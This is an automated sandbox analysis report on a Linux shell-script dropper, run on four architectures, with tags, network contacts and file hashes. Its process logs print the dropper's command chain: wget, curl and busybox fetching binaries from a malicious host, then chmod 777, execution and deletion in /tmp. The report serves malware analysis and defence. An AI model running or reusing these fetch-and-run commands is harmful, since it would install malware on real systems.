Malware Analysis Report

2025-05-28 20:28

Sample ID 241125-ddgejsvkbx
Target b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh
SHA256 b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84

Threat Level: Shows suspicious behavior

The file b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 02:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 02:53

Reported

2024-11-25 02:55

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.9:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-25 02:53

Reported

2024-11-25 02:55

Platform

debian9-armhf-20240418-en

Max time kernel

148s

Max time network

3s

Command Line

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 02:53

Reported

2024-11-25 02:55

Platform

debian9-mipsbe-20240418-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-25 02:53

Reported

2024-11-25 02:55

Platform

debian9-mipsel-20240611-en

Max time kernel

149s

Max time network

149s

Command Line

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A

Processes

/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh

[/tmp/b1304bfeb8a1f6b48018012108dcdac58da9eebd03cf9fe784256a37528ada84.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97